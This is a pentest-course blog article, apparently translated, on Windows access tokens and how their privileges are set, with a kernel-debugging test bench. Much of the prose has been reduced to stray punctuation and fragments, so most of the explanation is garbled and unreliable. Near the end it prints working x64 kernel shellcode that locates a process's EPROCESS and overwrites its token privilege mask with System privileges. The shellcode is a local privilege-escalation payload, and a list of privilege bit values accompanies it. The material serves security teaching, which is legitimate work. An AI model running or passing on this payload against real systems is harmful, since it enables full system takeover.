Clever Geek Handbook

Windows Tokens

OTUS expert - Alexander Kolesnikov shared with us a useful article, which he wrote specifically for students of the course "Pentest. Practice of Penetration Testing" .









We, in turn, invite everyone to take part in a free demo lesson on the topic: "Windows AD collection of information, escalation of privileges. Exploits and vulnerabilities of the last 5 years."









The previous article discussed how exploits use the token copy technique to escalate privileges. In this article, we will try to consider another technique for modifying tokens, and also try to find out how the privileges that are placed in the Primary Token are set.





All examples in the article are for informational purposes only, and if you want to repeat the experiments, then use a virtual machine, since some of the actions can damage your working machine. All experiments are performed for research purposes only.





Test bench setup

For experiments, a couple of virtual machines that work over a NAT network are suitable. Two because there is no other way to do kernel debugging of the operating system. And NAT network, so that there are debug symbols, it is easier and faster to search for data without source code. The debugger setting is available on the Internet, but still below there will be a couple of lines as it is done for the Windows 10 1909 operating system.





1. Install the debugger. For the Windows operating system, there is only Windbg Preview, install it:





2. We transfer the target operating system to debug mode:





We reboot the system. And open the second machine, which will contain the debugger:





After rebooting the system:





Windbg Preview , . . .





Token

, , , Primary Token. , Se* . , , :





  • SeAssignPrimaryToken





  • SeAudit





  • SeBackup





  • SeChangeNotify





  • SeCreateToken





  • SeDebug





  • SeLoadDriver





  • SeLockMemory





  • SeManageVolume





  • SeRestore





  • SeSecurity





  • SeTakeOwnership





, , . , “Security Descriptor”:





System. — dx @$cursession.Processes[4].KernelObject.Token







EXFAST_REF , , :





System:





, “Security Descriptor” , . :





, , :





- , BSOD. Windows , Windows 10 1607. , BSOD, “Security Descriptor” . , :





BSOD? , . , :





1. , :





2. cmd.exe



:





3. . :





, . - , - Integrity Levels , .





? . , : 0x1







BSOD , , . , , . , - — 0x100000







:





  • SeDebugPrivilege - 0x100000





  • SeAuditPrivilege - 0x200000





  • SeSystemEnvironmentPrivilege - 0x400000





  • SeCreatePermanentPrivilege - 0x010000





  • SeSystemtimePrivilege - 0x001000





  • SeSecurityPrivilege - 0x000100





  • SeLockMemoryPrivilege - 0x000010





, 6 . , , shellcode, , , . SEPTOKEN_PRIVILEGES _SEPTOKENPRIVILEGES+0x8.





— System , , .





netstat -ab



, . ? . , Windows , System , :





, , payload :





[BITS 64]

start:
mov r9, [gs:0x188]                ;KPROCESS/currentThread
mov r9, [r9+0x220]                ;EPROCESS   KTHREAD
mov r8, [r9+0x3e8]                ;InheritedFromUniqueProcessId (cmd.exe PID)
mov rax, r9                           
loop1:
  mov rax, [rax + 0x2f0]       
  sub rax, 0x2f0                    ;KPROCESS
  cmp [rax + 0x2e8],r8              ; ProcessId
  jne loop1                         	  
mov rcx, rax                        ;   PID EPROCESS
add rcx, 0x360                        
mov rax, [rcx]                           
and rax, 0xFFFFFFFFFFFFFFF0
mov r8,  0x1e73deff20               ;System  
mov [rax+0x48],r8                   ; 
ret

". ".



"Windows AD , . 5 ."











More articles:


All Articles